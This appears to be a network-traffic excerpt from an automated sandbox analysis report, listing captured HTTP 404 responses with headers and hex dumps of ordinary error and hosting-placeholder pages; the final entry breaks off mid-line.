                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Mon, 11 Nov 2024 16:03:48 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "6729ca88-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Mon, 11 Nov 2024 16:03:51 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "6729ca88-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Mon, 11 Nov 2024 16:03:55 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "6729ca88-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Mon, 11 Nov 2024 16:03:57 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "6729ca88-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Mon, 11 Nov 2024 16:04:42 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-11-11T16:04:47.7048831Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 16:05:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closex-ray: p529:0.000Data Raw: 31 37 64 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 54 49 54 4c 45 3e d0 a1 d0 b0 d0 b9 d1 82 20 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 20 d0 bd d0 b5 20 d0 bd d0 b0 d1 81 d1 82 d1 80 d0 be d0 b5 d0 bd 20 d0 bd d0 b0 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d0 b5 3c 2f 54 49 54 4c 45 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 64 6d 2e 74 6f 6f 6c 73 2f 70 61 72 6b 69 6e 67 2d 70 61 67 65 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 61 6e 67 75 61 67 65 73 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 65 6e 27 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 74 69 74 6c 65 27 3a 20 27 57 65 62 73 69 74 65 20 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 64 20 6f 6e 20 73 65 72 76 65 72 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 68 31 27 3a 20 27 57 65 62 73 69 74 65 20 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 64 20 6f 6e 20 73 65 72 76 65 72 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 2e 6d 65 73 73 61 67 65 31 27 3a 20 27 57 65 62 73 69 74 65 20 3c 62 3e 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 3c 2f 62 3e 20 69 73 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 64 20 6f 6e 20 74 68 65 20 68 6f 73 74 69 6e 67 20 73 65 72 76 65 72 2e 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 2e 6d 65 73 73 61 67 65 32 27 3a 20 27 44 6f 6d 61 69 6e 20 61 64 64 72 65 73 73 20 72 65 63 6f 72 64 20 70 6f 69 6e 74 73 20 74 6f 20 6f 75 72 20 73 65 72 76 65 72 2c 20 62 75 74 20 74 68 69 73 20 73 69 74 65 20 69 73 20 6e 6f 74 20 73 65 72 76 65 64 2e 3c 62 72 3e 49 66 20 79 6f 75 20 68 61 76 65 20 72 65 63 65 6e 74 6c 79 20 61 64 64 65 64 20 61 20 73 69 74 65 20 74 6f 20 79 6f 75 72 20 63 6f 6e 74 72 6f 6c 20 70 61 6e 65 6c 20 2d 20 77 61 69 74 20 31 35 20 6d 69 6e 75 74 65 73 20 61 6e 64 20 79 6f 75 72 20 73 69 74 65 20 77 69 6c 6c 20 73 74 61 72 74 20 77 6f 72 6b 69 6e 67 2e 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 2e 68 65 6c 70 5f 62 75 74 74 6f 6e 27 3a 20 27 48 6f 77 20 63 61 6e 20 49 20 66 69 78 20 74 68 69 73 3f 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 16:05:43 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 16:05:45 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 16:05:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this 